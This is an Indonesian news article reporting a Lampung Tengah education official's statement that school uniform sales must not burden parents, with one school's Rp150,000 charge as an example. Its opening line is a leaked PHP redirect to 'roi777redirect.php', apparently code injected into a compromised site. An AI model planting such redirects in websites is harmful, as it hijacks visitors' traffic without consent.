header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Seragam Sekolah Jangan Memberatkan !!! -
Seragam Sekolah Jangan Memberatkan !!!

TRANSLAMPUNG.COM, GUNUNGSUGIH – Berkaitan dengan penyediaan baju seragam siswa oleh pihak sekolah masih diperbolehkan tetapi dengan berbagai catatan. Salahsatunya biaya seragam sekolah tidak memberatkan orang tua siswa.

Kendati diperbolehkan, Dinas Pendidikan Lampung Tengah tidak pernah menginstruksikan atau mengarahkan agar orang tua siswa membeli baju seragam ke sekolah. “Saya tidak pernah menginstruksikan untuk menjual seragam sekolah,” tegas Plt. Kepala Dinas Pendidikan dan Kebudayaan (Disdikbud) Lampung Tengah Rosidi, belum lama ini.

Penyediaan pakaian seragam sekolah, menurut Rosidi, dimungkinkan kebijakan sekolah. Tapi hal itu harus melalui kesepakatan antara komite dan kepala sekolah. Kemudian kesepakatan tersebut harus dituangkan dalam berita acara.

Kembali Rosidi menegaskan, hal yang terpenting yaitu pihak sekolah tidak memberatkan orang tua siswa dalam penyediaan pakaian seragam sekolah. “Sepanjang harganya patut dan wajar tidak masalah. Tapi kalau harganya tidak wajar maka itu tidak diperbolehkan,” kata Rosidi.

Ia menekankan agar sekolah tidak memberatkan orang tua siswa. Sebab, sekolah merupakan sarana tempat anak-anak menimba ilmu dan mencerdaskan anak bangsa. “Sekali lagi saya tegaskan, jangan ada satu pun yang diberatkan oleh sekolah,” tukasnya.

Dari informasi yang diterima Radar Lamteng, memasuki tahun ajaran baru pihak sekolah khususnya yang berstatus negeri menarik uang untuk pembelian baju seragam batik dan pakaian olahraga. Seperti terjadi di SDN Kelurahan Yukumjaya, Kecamatan Terbanggibesar. Di salah satu sekolah negeri tersebut menarik dana hingga Rp150 ribu untuk baju batik dan pakaian olahraga.(jar)

News Reporter